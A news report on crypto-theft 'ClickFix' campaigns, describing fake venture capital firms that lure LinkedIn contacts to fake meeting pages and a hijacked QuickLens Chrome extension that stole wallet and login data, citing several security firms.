Crypto hackers attempting to use “ClickFix” attacks to steal crypto have now turned to impersonating venture capital firms and hijacking browser extensions in their two most recent attacks.

According to a report by cybersecurity firm Moonlock Lab on Monday, scammers are using fake venture capital firms such as SolidBit, MegaBit and Lumax Capital. The hackers are using the firms to contact users via LinkedIn with partnership offers, then funneling them to fake Zoom and Google Meet links.

When a target clicks the fraudulent link, they are taken to an event page featuring a fake Cloudflare “I’m not a robot” checkbox. Clicking it copies a malicious command to the clipboard and prompts the user to open their computer’s terminal and paste the so-called verification code, which executes the attack.

“The ClickFix technique is what makes the final step so effective,” the Moonlock Lab team said. “By turning the victim into the execution mechanism—having them paste and run the command themselves—the attackers sidestep the very controls the security industry has spent years building. No exploit. No suspicious download.”

Moonlock Lab alleges that a person using the name Mykhailo Hureiev, listed as the co-founder and managing partner at SolidBit Capital, has been a primary point of contact for the initial LinkedIn phase of the scam. Two X users have also reported suspicious conversations with a Hureiev account.

A user under the name Mykhailo Hureiev has allegedly been the primary point of contact for the scam's initial LinkedIn phase. Source: big dan

However, Moonlock Lab notes that the campaign's infrastructure is sophisticated and designed to rotate identities as soon as one front is exposed.

Chrome extension hijacked to steal crypto

Meanwhile, crypto hackers have, until recently, been spreading a malicious Chrome extension with a “ClickFix” attack angle.

QuickLens, an extension that lets users run Google Lens searches directly in their browser, was removed from the web store after it was compromised to push malware, John Tuckner, the founder of cybersecurity firm Annex Security, said in a Feb. 23 report.

After QuickLens changed ownership on Feb. 1, a new version was released two weeks later containing malicious scripts that launched ClickFix attacks and other information-stealing tools. Tuckner noted that the extension had around 7,000 users.

QuickLens was removed from the web store after it was compromised to push malware. Source: Annex Security

The hijacked extension reportedly searched for crypto wallet data and seed phrases to steal funds. It also scraped the contents of Gmail inboxes, YouTube channel data, and other login credentials or payment information entered into web forms, according to a eSecurity Planet report on March 2.

ClickFix attacks are used to target many industries

The ClickFix technique has gained popularity among threat actors since last year, according to Moonlock Lab, because it forces victims to execute the malicious payload manually, bypassing standard security tools.

However, security researchers have been tracking its use since at least 2024, with targets spanning a wide range of industries.

Microsoft Threat Intelligence sent out a warning in August last year that it had been tracking “campaigns targeting thousands of enterprise and end-user devices globally every day.”

Meanwhile, cyber threat intelligence company Unit42 reported in July last year that the “relatively new social engineering technique” has been impacting industries such as manufacturing, wholesale and retail, state and local governments, and utilities and energy.

